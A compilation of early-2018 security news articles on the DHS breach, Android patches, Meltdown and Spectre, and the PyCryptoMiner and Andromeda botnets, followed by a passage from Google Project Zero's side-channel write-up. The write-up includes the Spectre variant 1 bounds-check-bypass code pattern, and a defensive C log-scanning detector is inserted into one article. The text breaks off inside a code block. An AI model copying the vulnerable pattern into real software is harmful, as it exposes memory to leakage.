“SaaS platforms remain a ‘Wild West’ for threat actors and defenders alike. New tools like Google Apps Script are rapidly adding functionality while threat actors look for novel ways of abusing these platforms. At the same time, few tools exist that can detect threats generated by or distributed via legitimate software-as-a-service (SaaS) platforms,” explained Maor Bin, security research lead of Threat Systems Products at Proofpoint.

“This creates considerable opportunities for threat actors who can leverage newfound vulnerabilities or use ‘good for bad’: making use of legitimate features for malicious purposes,” he added.

A few months ago, Google announced the introduction of new warnings for potentially risky web apps and Apps Scripts.


247,000 DHS current and former federal employees affected by a privacy incident
4.1.2017 securityaffairs Incident

A privacy incident suffered by the Department of Homeland Security (DHS) exposed data related to 247,167 current and former federal employees.
A data breach suffered by the Department of Homeland Security exposed data related to 247,167 current and former federal employees that were employed by the Agency in 2014.

The data breach affected a database used by the DHS Office of the Inspector General (OIG) that was stored in the Department of Homeland Security OIG Case Management System.

“On January 3, 2018, select DHS employees received notification letters that they may have been impacted by a privacy incident related to the DHS Office of Inspector General (OIG) Case Management System. The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized transfer of data.” reads the announcement published by the DHS.

Exposed data includes employee names, Social Security numbers, birth dates, positions, grades, and duty stations.

The incident also affected a second group of individuals (i.e., subjects, witnesses, and complainants) associated with Department of Homeland Security OIG investigations from 2002 through 2014 (the “Investigative Data”).

The data leak was the result of an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The copy was discovered on May 10, 2017, as part of an ongoing criminal investigation being conducted by Department of Homeland Security OIG and the U.S. Attorney’s Office.

The Department of Homeland Security sent notification letters to affected individuals, and it is also implementing additional security measures to limit access to this kind of information.

All individuals potentially affected by the incident are being offered 18 months of free credit monitoring and identity protection services.

“Department of Homeland Security is implementing additional security precautions to limit which individuals have access to this information and will better identify unusual access patterns. ” continues the Department of Homeland Security.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network.”


Android Security Bulletin for January 2018, tech giant fixes multiple Critical flaws
4.1.2017 securityaffairs Android

Google patched five Critical bugs and 33 High severity flaws as part of the Android Security Bulletin for January 2018.
The tech giant addressed 38 Android security vulnerabilities, 20 as part of the 2018-01-01 security patch level and 18 in the 2018-01-05 security patch level.

The 2018-01-01 security patch level fixed four Critical remote code execution issues and 16 High risk elevation of privilege and denial of service flaws.

The most severe vulnerability in Android runtime, tracked as CVE-2017-13176, could be exploited by a remote attacker to bypass user interaction requirements in order to gain access to additional permissions.

A Critical remote code execution flaw was fixed in System, the company also addressed one High risk denial of service vulnerability and two High severity elevation of privilege vulnerabilities.

The security updates fixed 15 vulnerabilities in Media framework; the most severe one could be exploited by an attacker using a specially crafted malicious file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level addressed just one Critical flaw in the Qualcomm components, it could allow a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process.

The 2018-01-05 security patch level also fixed 1 Critical issue and 6 High severity vulnerabilities in Qualcomm closed-source components.

The patch level addressed High risk elevation of privilege flaws in LG components, MediaTek components, Media framework, and NVIDIA components.

The security patch level addressed one information disclosure bug in Kernel components, and three High severity elevation of privilege flaws.

The tech giant also resolved 46 vulnerabilities in Google devices as part of the Pixel / Nexus Security Bulletin—January 2018.

High severity flaws only affected older Android versions, meanwhile, most of the issues were rated Moderate severity.

The affected components included Framework (1 vulnerability), Media framework (16 vulnerabilities), System (1 flaw), Broadcom components (1 issue), HTC components (1 flaw), Kernel components (7 bugs), MediaTek components (1 issue), and Qualcomm components (18 vulnerabilities).


Meltdown and Spectre attacks affect almost any processor, including Intel, ARM, AMD ones
4.1.2017 securityaffairs
Vulnerability

The Meltdown and Spectre attacks could allow attackers to steal sensitive data which is currently processed on the computer.
Almost every modern processor is vulnerable to the ‘memory leaking’ flaws; this has emerged from the technical analysis triggered by the announcement of vulnerabilities in Intel chips.

White hat hackers from Google Project Zero have disclosed vulnerabilities that potentially impact all major CPUs, including those manufactured by AMD, ARM, and Intel.

The experts devised two attacks, dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to access sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

“A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.” reads the description of ‘speculative execution’ provided by Google hackers.

The experts explained that it is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound and can lead to information disclosure.


The Meltdown Attack

The Meltdown attack could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

“Meltdown is a related microarchitectural attack which exploits out-of-order execution in order to leak the target’s physical memory.” reads the paper on the Spectre attack.

“Meltdown exploits a privilege escalation vulnerability specific to Intel processors, due to which speculatively executed instructions can bypass memory protection.”

Meltdown exploits speculative execution to breach the isolation between user applications and the operating system; in this way, any application can access all system memory.

Almost any computer is currently vulnerable to the Meltdown attack.

The Spectre Attack

The Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack is hard to mitigate because solving it requires changes to the processor architecture.
The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems. The Spectre attack works on almost every system, including desktops, laptops, cloud servers, as well as smartphones.

“In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.” continues the paper.

“KAISER patch, which has been widely applied as a mitigation to the Meltdown attack, does not protect against Spectre.”

The main vendors have rushed to provide security patches to protect their systems from these attacks.

Windows — Microsoft has issued an out-of-band patch update for Windows 10; the other versions will be fixed with the next Patch Tuesday, planned for January 9, 2018.
MacOS — Apple fixed most of these security holes in macOS High Sierra 10.13.2 last month.
Linux — Linux kernel developers have also released patches by implementing kernel page-table isolation (KPTI) to isolate kernel memory.
Android — Google has released security patches for Pixel/Nexus users as part of the Android January security patch update.


Hackers Expected to Remotely Exploit CPU Vulnerabilities
4.1.2018 securityweek
Vulnerability

Security experts believe hackers will soon start to remotely exploit the recently disclosed vulnerabilities affecting Intel, AMD and ARM processors, if they haven’t done so already.

Researchers disclosed on Wednesday the details of Spectre and Meltdown, two new attack methods targeting CPUs. The attacks leverage three different flaws and they can be used to bypass memory isolation mechanisms and gain access to sensitive data, including passwords, photos, documents, and emails.

The affected CPUs are present in billions of products, including PCs and smartphones, and attacks can also be launched against cloud environments.

The best protection against these attacks is the use of kernel page table isolation (KPTI) and affected vendors have already started releasing patches and workarounds.

While the main attack vector is via local access (e.g. a piece of malware installed on the targeted machine), researchers say remote attacks via JavaScript are also possible, particularly in the case of Spectre.

Researchers have developed a proof-of-concept (PoC) for Google Chrome that uses JavaScript to exploit Spectre and read private memory from the process in which it runs.


Mozilla has conducted internal experiments and determined that these techniques can be used “from Web content to read private information between different origins.” While the issue is still under investigation, the organization has decided to implement some partial protections in Firefox 57.

Google pointed out that attacks are possible via both JavaScript and WebAssembly. The company informed customers that current versions of Chrome include a feature named Site Isolation that can be manually enabled to prevent attacks. Chrome 64, which is scheduled for release on January 23, will contain mitigations in the V8 JavaScript engine. Other hardening measures will be included in future versions, but the tech giant warned that they may have a negative impact on performance.

Microsoft has also confirmed that attacks can be launched via JavaScript code running in the browser. The company has released updates for its Edge and Internet Explorer web browsers to mitigate the vulnerabilities.

Since a JavaScript PoC is available, experts believe it’s only a matter of time until malicious actors start exploiting the flaws remotely. While some say state-sponsored actors are most likely to leverage these attacks, others point out that mass exploitation is also possible, particularly via the ads served by websites.

That is why some experts have advised users to disable JavaScript in their browser and install ad blockers.

Mike Buckbee, security engineer at Varonis, noted that while exploitation via the browser might not give attackers access to files, they are still likely to find valuable data in the memory, including SSH keys, security tokens and passwords.

While affected vendors say there is no evidence that Spectre and Meltdown have been exploited prior to their disclosure, the researchers who discovered the vulnerabilities warn that attacks are not easy to detect.

Researcher Jake Williams said, “It's reasonable to assume that most nation states had Spectre and Meltdown before public announcement. If by some miracle they weren't already using these, they will be now.”

Bryce Boland, Asia Pacific Chief Technology Officer at FireEye, agrees. “Nation state hackers typically use these types of vulnerabilities to develop new attack tools, and that's likely in this case,” he said.

Sam Curry, Chief Security Officer at Cybereason, also believes sophisticated actors will likely exploit the flaws, if they haven’t done so already.

“This isn't yet doom and gloom but the tension will rise. And don't be surprised if it comes to light that a nation state is already using this or if a catalyst in the form of hack or research further heats this up and makes it a more clear-and-present risk in 2018.”


247,000 DHS Employees Affected by Data Breach
4.1.2018 securityweek Incident
Information on nearly a quarter million Department of Homeland Security (DHS) employees was exposed as part of an "unauthorized transfer of data", the DHS announced.

The privacy incident involved a database used by the DHS Office of the Inspector General (OIG) which was stored in the DHS OIG Case Management System.

The incident impacted approximately 247,167 current and former federal employees that were employed by DHS in 2014. The exposed personally identifiable information (PII) of these individuals includes names, Social Security numbers, birth dates, positions, grades, and duty stations.

Individuals (both DHS employees and non-DHS employees) associated with DHS OIG investigations from 2002 through 2014 (including subjects, witnesses, and complainants) were also affected by the incident, the DHS said.

The PII associated with these individuals varies depending on the documentation and evidence collected for a given case and could include names, social security numbers, alien registration numbers, dates of birth, email addresses, phone numbers, addresses, and personal information provided in interviews with DHS OIG investigative agents.

The data breach wasn’t the result of an external attack, the DHS claims. The leaked data was found in an unauthorized copy of the DHS OIG investigative case management system that was in the possession of a former DHS OIG employee.

The data breach was discovered on May 10, 2017, as part of an ongoing criminal investigation conducted by DHS OIG and the U.S. Attorney’s Office.

“The privacy incident did not stem from a cyber-attack by external actors, and the evidence indicates that affected individual’s personal information was not the primary target of the unauthorized exfiltration,” DHS explained.

The Department said that notification letters were sent to select DHS employees to inform them that they might have been impacted. DHS also says that it conducted a thorough privacy investigation, a forensic analysis of the compromised data, and assessed the risk to affected individuals before making the incident public.

Following the incident, the DHS says it is implementing additional security precautions to limit access to the type of information that was released in this incident and to better identify unusual access patterns.

“We will continue to review our systems and practices in order to better secure data. DHS OIG has also implemented a number of security precautions to further secure the DHS OIG network,” DHS notes.

Additional information for the affected individuals is available in an announcement and FAQ published on Jan 3.


Tech Giants Address Critical CPU Vulnerabilities
4.1.2018 securityweek
Vulnerability
Several major tech companies have started releasing patches and mitigations for the recently disclosed Meltdown and Spectre vulnerabilities affecting CPUs from Intel, AMD and ARM.

The flaws exploited by the Meltdown and Spectre attacks, tracked as CVE-2017-5715, CVE-2017-5753 and CVE-2017-5754, allow malicious applications to bypass memory isolation mechanisms and access data as it’s being processed. This can include passwords, photos, documents, emails, and data from instant messaging apps.

Billions of PCs, smartphones and cloud instances are affected, and while there is no evidence of attacks in the wild, researchers said exploitation attempts are unlikely to be detected.

Meltdown

Attacks can be prevented using kernel page table isolation (KPTI), a hardening technique designed to improve security by isolating kernel from user memory. However, the mitigation can introduce performance penalties of up to 30 percent for affected processors.

Researchers had initially planned on disclosing the security holes on January 9, but disclosure was moved up due to media reports and speculation surrounding the topic. Affected tech companies have already started informing users about the risks and the availability of patches and mitigations.

Intel, AMD and ARM

Initial reports claimed only Intel CPUs were affected by the vulnerabilities. While Intel was hit the hardest, some of the flaws affect AMD and ARM as well.

Intel has informed customers that it’s working with manufacturers and operating system vendors to address the issues. The company also reassured customers that performance penalties will not affect regular computer users and will be mitigated over time.

Spectre

AMD is apparently only affected by the Spectre vulnerabilities (CVE-2017-5753 and CVE-2017-5715), and the company claims the risk to its processors is “near zero” thanks to their architecture.

In the case of ARM, the company says only its Cortex-A75 processors are affected by all three vulnerabilities. Cortex R7, R8, A8, A9, A15, A17, A57, A72 and A73 processors are vulnerable to Meltdown attacks and affected by the CVE-2017-5715 Spectre flaw. Other existing products and future processors are not affected, the company said.

ARM has provided kernel patches for Linux users and advised customers using Android and other OSs to check for updates from their respective vendor.

Google

Google has patched the vulnerabilities in its Cloud platform, but some users may need to manually perform some tasks.

“Google Compute Engine used VM Live Migration technology to perform host system and hypervisor updates with no user impact, no forced maintenance windows, and no mass reboots required. However, all guest operating systems and versions must be patched to protect against this new class of attack regardless of where those systems run,” Google said.

The company has informed Android users that while the risk of attacks is small, the latest Android security updates do provide additional protection against Spectre and Meltdown.

Microsoft

Microsoft started implementing protections in Windows a few months ago. The company informed customers on Wednesday that it released several updates to help mitigate the vulnerabilities in Windows client and server products. It has also released a tool designed to tell customers if protections are enabled.

Microsoft is also working to ensure that customers of its Azure cloud platform are not vulnerable to Meltdown and Spectre attacks.

“The majority of Azure infrastructure has already been updated to address this vulnerability. Some aspects of Azure are still being updated and require a reboot of customer VMs for the security update to take effect,” the company said.

Apple

Apple has yet to make any public statements, but security expert Alex Ionescu reported that version 10.13.2 of macOS High Sierra, which Apple released on December 6, does fix the vulnerabilities.

Xen, Amazon Web Services (AWS), DigitalOcean, Rackspace

The Xen Project said systems running any version of the Xen hypervisor are affected. Due to the accelerated disclosure, the organization has not had time to create patches, and mitigations are available for only one of the security holes.

AWS, which uses Xen, told customers, “All but a small single-digit percentage of instances across the Amazon EC2 fleet are already protected. The remaining ones will be completed in the next several hours, with associated instance maintenance notifications.”

Rackspace, which also uses Xen, is currently investigating the issue. DigitalOcean has also launched an investigation, but the company has blamed Intel’s embargo for not determining potential impact sooner.

Mozilla

Mozilla has conducted some internal experiments and found that it is possible to use techniques similar to Meltdown and Spectre from web content to read private data between different origins. The full extent of the issue has yet to be determined, but some partial mitigations have already been added to Firefox.

Red Hat

Red Hat has classified the vulnerabilities as important and it has already developed kernel updates for affected versions of Red Hat Enterprise Linux.

“We are working with our customers and partners to make these updates available, along with the information our customers need to quickly secure their physical systems, virtual images, and container-based deployments,” said Chris Robinson, manager of Product Security Assurance at Red Hat.

nVIDIA

nVIDIA said its GPU hardware does not appear to be impacted by Meltdown and Spectre, but some system-on-a-chip (SoC) products using ARM CPUs are vulnerable. The company is working on identifying affected products and preparing mitigations.


Crypto-Miner Botnet Spreads over SSH
4.1.2018 securityweek BotNet
A recently discovered Linux crypto-miner botnet spreading over the SSH protocol is based on the Python scripting language, which makes it difficult to detect, F5 Networks has discovered.

Dubbed PyCryptoMiner, the botnet is using Pastebin to receive new command and control server (C&C) assignments when the original C&C isn’t available. Under active development, the botnet recently added scanner functionality hunting for vulnerable JBoss servers (exploiting CVE-2017-12149), F5 says.

Designed to mine for Monero, a highly anonymous crypto-currency, the botnet is estimated to have generated the equivalent of approximately $46,000 as of late December.

PyCryptoMiner isn’t the only botnet targeting online Linux systems, but because of its scripting language-based nature, the malware is more evasive and can be easily obfuscated. Furthermore, it is executed by a legitimate binary, F5's researchers discovered.

The botnet spreads by attempting to guess the SSH login credentials of target Linux machines. If the credentials are successfully discovered, the attacking bot deploys a simple base64-encoded spearhead Python script designed to connect to the C&C server to download and execute additional Python code.

The second-stage code is the main bot controller, which registers a cron job on the infected machine to establish persistence.

The original spearhead bash script also collects information on the infected device, including Host/DNS name, OS name and architecture, number of CPUs, and CPU usage. It also checks whether the machine has been already infected and whether the bot is used for crypto-mining or scanning.

The bot then sends a report with the collected information to the C&C, which responds with task details. A task includes an arbitrary command to be executed, an update, an identifier so the C&C can synchronize botnet results, and the time interval at which to poll the C&C. The bot sends the output of the executed task back to the C&C.
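The infection chain described above starts with guessed SSH passwords, so the earliest host-side signal is the pattern in OpenSSH's auth log: a burst of "Failed password" lines from one source followed by an "Accepted password" from the same source. The following is an added example, not F5's code or the botnet's, written in C to match the rest of the page's examples: it parses a constructed set of such log lines and flags that sequence. The sample lines, the addresses (RFC 5737 documentation ranges), and the function names are all this example's own assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed sample of OpenSSH auth-log lines (not real data; the IPs are
 * from RFC 5737 documentation ranges). */
static const char *SAMPLE_LOG[] = {
    "Jan  4 10:01:02 host sshd[1201]: Failed password for root from 203.0.113.7 port 51112 ssh2",
    "Jan  4 10:01:03 host sshd[1201]: Failed password for root from 203.0.113.7 port 51112 ssh2",
    "Jan  4 10:01:05 host sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 51120 ssh2",
    "Jan  4 10:01:06 host sshd[1205]: Failed password for root from 203.0.113.7 port 51130 ssh2",
    "Jan  4 10:01:08 host sshd[1207]: Accepted password for root from 203.0.113.7 port 51140 ssh2",
    "Jan  4 10:02:00 host sshd[1300]: Accepted publickey for alice from 198.51.100.20 port 40000 ssh2",
    "Jan  4 10:02:10 host sshd[1310]: Failed password for bob from 198.51.100.21 port 40010 ssh2",
    "Jan  4 10:02:12 host sshd[1311]: Accepted password for bob from 198.51.100.21 port 40012 ssh2",
};

size_t sample_log_count(void) { return sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0]; }

#define MAX_SOURCES 64

/* Per-source counter of password failures seen since the last success. */
struct source_stat { char ip[16]; int failures; };

/* Returns the table slot for ip, adding it if needed; -1 when the table is full. */
static int find_or_add(struct source_stat *table, int *count, const char *ip)
{
    for (int i = 0; i < *count; i++)
        if (strcmp(table[i].ip, ip) == 0)
            return i;
    if (*count >= MAX_SOURCES)
        return -1;
    snprintf(table[*count].ip, sizeof table[*count].ip, "%s", ip);
    table[*count].failures = 0;
    return (*count)++;
}

/* Copies the token after " from " (the client address) into ip. */
static int extract_source_ip(const char *line, char *ip, size_t ip_len)
{
    const char *p = strstr(line, " from ");
    if (!p)
        return 0;
    p += strlen(" from ");
    size_t i = 0;
    while (*p && *p != ' ' && i + 1 < ip_len)
        ip[i++] = *p++;
    ip[i] = '\0';
    return i > 0;
}

/* Scans the lines in order and counts password logins accepted after at least
 * `threshold` failed password attempts from the same source. The first flagged
 * source address is copied into `flagged` (empty string if none). */
int detect_bruteforce_success(const char **lines, size_t nlines, int threshold,
                              char *flagged, size_t flagged_len)
{
    struct source_stat table[MAX_SOURCES];
    int count = 0, hits = 0;
    char ip[16];

    if (flagged_len)
        flagged[0] = '\0';
    for (size_t i = 0; i < nlines; i++) {
        if (!extract_source_ip(lines[i], ip, sizeof ip))
            continue;
        int slot = find_or_add(table, &count, ip);
        if (slot < 0)
            continue;
        if (strstr(lines[i], "Failed password")) {
            table[slot].failures++;
        } else if (strstr(lines[i], "Accepted password")) {
            if (table[slot].failures >= threshold) {
                hits++;
                if (flagged_len && flagged[0] == '\0')
                    snprintf(flagged, flagged_len, "%s", ip);
            }
            table[slot].failures = 0; /* a success closes the burst */
        }
    }
    return hits;
}

static char g_flagged[16];

/* Runs the detector over the constructed sample; returns the hit count and
 * keeps the first flagged source for last_flagged_ip(). */
int run_sample_detection(int threshold)
{
    return detect_bruteforce_success(SAMPLE_LOG, sample_log_count(), threshold,
                                     g_flagged, sizeof g_flagged);
}

const char *last_flagged_ip(void) { return g_flagged; }

int main(void)
{
    int hits = run_sample_detection(3);
    printf("%d password login(s) accepted after a failure burst; first source: %s\n",
           hits, hits ? last_flagged_ip() : "(none)");
    return 0;
}
```

The detector deliberately ignores public-key logins and resets the per-source counter on success, so one stray typo from a legitimate user (the "bob" lines at the default threshold) is not flagged while a guessing run that finally lands is. In production the same logic would run over a log tail or journal output and feed an alert; pairing it with a check for new cron entries that launch an interpreter on a base64 blob covers the persistence step described above as well.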

In mid-December, the botnet was updated with code to scan for vulnerable JBoss servers, in an attempt to exploit CVE-2017-12149, a vulnerability disclosed several months ago.

“The list of the targets to scan is controlled by the C&C server, while the bot has a separate thread that polls the C&C server for new targets. The server responds with a Class C IP range to scan but could also provide a single IP address,” the researchers reveal.

The botnet uses two pool addresses that show approximately 94 and 64 Monero, with a value of around $60,000. However, the researchers are uncertain how much profit the threat actor behind the malware has made overall.

Unlike other malware that has the C&C server address hardcoded, which causes bots to become unreachable when the server is taken down, the botnet uses Pastebin to publish an alternate C&C server address if the original one is unreachable.

According to F5, with all C&C servers of the botnet inaccessible at this moment, all newly infected bots are idle, polling for the attacker’s Pastebin.com page, which could be updated at any time.

The page allowed researchers to determine that the botnet might have been active since August 2017, and that the resource had been viewed 177,987 times at the time of the investigation. However, the researchers couldn’t determine the exact size of the botnet, as a single bot could periodically ask the resource if the C&C server is down.

Looking at other resources created by the same actor, who uses the moniker “WHATHAPPEN”, the researchers discovered 235 email addresses and more than 36,000 domains associated with them. The registrant has been involved in scams, gambling, and adult services since 2012.

“Our research is still ongoing while we hunt for more missing pieces of this puzzle, such as the “scanner node” component and additional C&C servers, if there are any. We are also waiting to see whether the current C&C server will come back to life,” F5 notes.


Andromeda Botnet to Die Slow, Painful Death After Takedown
4.1.2018 securityweek BotNet
Following a takedown operation in early December 2017, the Andromeda botnet is expected to slowly disappear from the threat landscape, ESET says.

Also known as Wauchos or Gamarue, the botnet has been around since at least September 2011 and lived through five major versions over the years. The Andromeda malware was detected or blocked on an average of around 1.1 million machines every month over the six months leading to the takedown.

The botnet was mainly used for stealing credentials and to download and install additional malware onto compromised systems. Thus, systems infected with Andromeda would likely have other threats installed on them as well, ESET says.

Some of the threats usually distributed via Andromeda included Kasidet, also known as Neutrino bot, which can launch distributed denial-of-service (DDoS) attacks, and Kelihos and Lethic, which are notorious spambots known for their involvement in massive junk mail campaigns. It was also used for the distribution of the Dridex banking Trojan and point-of-sale (PoS) malware GamaPoS.

Andromeda was distributed through various methods, including social media, instant messaging, removable media, spam, drive-by downloads, and exploit kits. Because it didn’t conduct targeted attacks, the malware could infect any computer if the user clicked on malicious links.

Since there were no obvious signs to alert the user on the infection, the botnet managed to remain hidden and compromise a large number of systems. Featuring a modular design, the botnet could get additional capabilities through plugins such as a keylogger, a form grabber, and a rootkit.

ESET Senior Malware Researcher Jean-Ian Boutin, who was involved in the takedown operation, explains that the botnet’s numerous features and continuous development made it appealing to cybercriminals interested in using it. Thus, Andromeda was able to survive for a long period of time and to also become a prevalent threat.

At the time of Andromeda’s takedown, security researchers identified 464 distinct botnets, 80 associated malware families, and 1,214 domains and IP addresses of the botnet’s command and control (C&C) servers.

The takedown operation, a joint effort from the FBI, the Luneburg Central Criminal Investigation Inspectorate in Germany, Europol’s European Cybercrime Centre (EC3), the Joint Cybercrime Action Task Force (J-CAT), Eurojust, and private-sector partners, built on information gathered during the shutdown of a large criminal network known as Avalanche.

According to Boutin, investigators started gathering information and evidence in 2015 and needed a lot of time to get everything ready for a law enforcement operation. Following the takedown, authorities seized control of Andromeda’s C&C servers and the botnet is expected to slowly disappear.

“It will probably slowly disappear as remediation is under way. For this type of long-lived botnet, it is very hard to clean all the systems that have been compromised by Wauchos, but as long as the good guys are in control of the C&C servers, at least no new harm can be done to those compromised PCs,” Boutin says.


Reading privileged memory with a side-channel
4.1.2017 Google Project Zero
Vulnerability blog

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

So far, there are three known variants of the issue:

Variant 1: bounds check bypass (CVE-2017-5753)
Variant 2: branch target injection (CVE-2017-5715)
Variant 3: rogue data cache load (CVE-2017-5754)

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

Spectre (variants 1 and 2)
Meltdown (variant 3)

During the course of our research, we developed the following proofs of concept (PoCs):

A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)
A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.
Tested Processors
Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary
retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.
Variant 1: Bounds check bypass
This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.
Theoretical explanation
The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
Be carried out speculatively, before preceding branches are resolved.
Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.

Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
    unsigned long length;
    unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
    unsigned char value = arr1->data[untrusted_offset_from_caller];
    ...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
    unsigned long length;
    unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
    unsigned char value = arr1->data[untrusted_offset_from_caller];
    unsigned long index2 = ((value&1)*0x100)+0x200;
    if (index2 < arr2->length) {
        unsigned char value2 = arr2->data[index2];
    }
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.
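The following is an added example (not code from the original post) that puts the code pattern above next to a hardened form. The hardened version keeps the bounds check but additionally clamps the index with a branch-free mask before it is used, the index-masking construction that Linux later adopted as array_index_nospec(). The array contents, sizes and function names are constructed for the example. Architecturally both lookups return the same results; the difference is only visible on a mis-predicted path, where the masked index cannot reach past the array and so no secret-dependent address is formed.

```c
#include <stdlib.h>
#include <string.h>

#define ARR1_LEN 16UL    /* constructed: small array */
#define ARR2_LEN 0x400UL /* constructed: array of size 0x400 */

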